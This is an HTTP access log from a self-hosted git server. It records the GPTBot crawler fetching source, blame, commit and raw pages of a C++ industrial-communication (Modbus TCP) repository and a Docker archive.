"/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" +[17/Feb/2026:16:18:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:16:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:16:18:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:16:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:16:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 973] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:16:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 19909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:16:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10236] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12008] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11424] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" [Client 74.7.227.38] [Length 10147] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" +[17/Feb/2026:16:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 16620] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" +[17/Feb/2026:16:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 17551] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" +[17/Feb/2026:16:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" [Client 74.7.227.38] [Length 15273] [Gzip 5.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" +[17/Feb/2026:16:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 11165] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" +[17/Feb/2026:16:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" [Client 74.7.227.38] [Length 18857] [Gzip 6.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" +[17/Feb/2026:16:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11162] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:16:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13018] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:16:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11308] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src" [Client 74.7.227.38] [Length 10128] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" +[17/Feb/2026:16:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 10159] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" +[17/Feb/2026:16:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 21546] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" +[17/Feb/2026:16:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" [Client 74.7.227.38] [Length 9920] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" +[17/Feb/2026:16:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 5832] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" +[17/Feb/2026:16:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 10153] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" +[17/Feb/2026:16:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" +[17/Feb/2026:16:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" [Client 74.7.227.38] [Length 16026] [Gzip 9.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" +[17/Feb/2026:16:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 5469] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" +[17/Feb/2026:16:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" [Client 74.7.227.38] [Length 9919] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" +[17/Feb/2026:16:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src" +[17/Feb/2026:16:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" +[17/Feb/2026:16:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 11631] [Gzip 5.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" +[17/Feb/2026:16:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 22862] [Gzip 12.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" +[17/Feb/2026:16:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" [Client 74.7.227.38] [Length 20512] [Gzip 12.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" +[17/Feb/2026:16:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" +[17/Feb/2026:16:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 10186] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" +[17/Feb/2026:16:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 12225] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src" +[17/Feb/2026:16:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 14186] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src" +[17/Feb/2026:16:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 11139] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src" +[17/Feb/2026:16:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" [Client 74.7.227.38] [Length 6497] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" +[17/Feb/2026:16:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10077] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" +[17/Feb/2026:16:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 12254] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" +[17/Feb/2026:16:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 610] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" +[17/Feb/2026:16:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 14215] [Gzip 7.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" +[17/Feb/2026:16:19:16 +0000] - 200 200 - GET https 